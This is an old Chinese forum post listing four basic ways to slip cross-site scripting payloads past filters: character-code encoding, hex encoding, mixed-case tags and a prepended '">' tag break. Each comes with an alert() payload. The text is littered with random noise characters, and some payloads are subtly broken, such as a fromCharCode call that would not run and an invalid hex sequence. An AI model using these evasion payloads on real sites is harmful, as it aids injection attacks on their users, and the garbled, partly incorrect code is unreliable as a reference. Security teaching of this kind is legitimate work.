四种超级基础的绕过方法。2 U+ P: Y K+ }9 p* m' `# a, |
1.转换为ASCII码
( Z N! V2 X' P9 o例子:原脚本为<script>alert(‘I love F4ck’)</script >+ K, q4 L9 U5 v! ?1 h1 Y
通过转换,变成:' V! w+ y% c6 O t7 L/ r
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>/ Q5 M% _4 \; X7 D
" a6 k: d0 K0 x, w \
2.转换为HEX(十六进制)
7 o P8 K. _* k# z( ^+ J例子:原脚本为<script>alert(‘I love F4ck’)</script>
7 w/ S' L7 l- a5 v# V通过转换,变成:
* a! @3 T1 H i) z& I: p$ [%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
: c* y0 x" y5 Y$ @6 K1 m/ `* N [
& c6 Q) {( J* X. f3.转换脚本的大小写
: {, z7 f4 l; y% I1 [- D例子:原脚本为<script>alert(‘I love F4ck’)</script>
) v+ Z% ^* K i' s: B/ E3 }转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>% h6 [4 p0 P5 n3 I1 f
, n& B" S( e; o& ^4.增加闭合标记”>' d2 F3 z4 m4 w/ Q0 K, k
例子:原脚本为<script>alert(‘I love F4ck’)</script>
X! M' }; u0 f+ F# ?& ^转换为:”><script>alert(‘I love F4ck’)</script>, u* u0 l# u4 M4 {# Z( H
更详细绕过技术请参考此网页) E' H$ a% d4 K+ m: t9 P) e
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet8 v1 X/ m0 l# a4 a6 o
+ A" @$ P2 M$ I转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对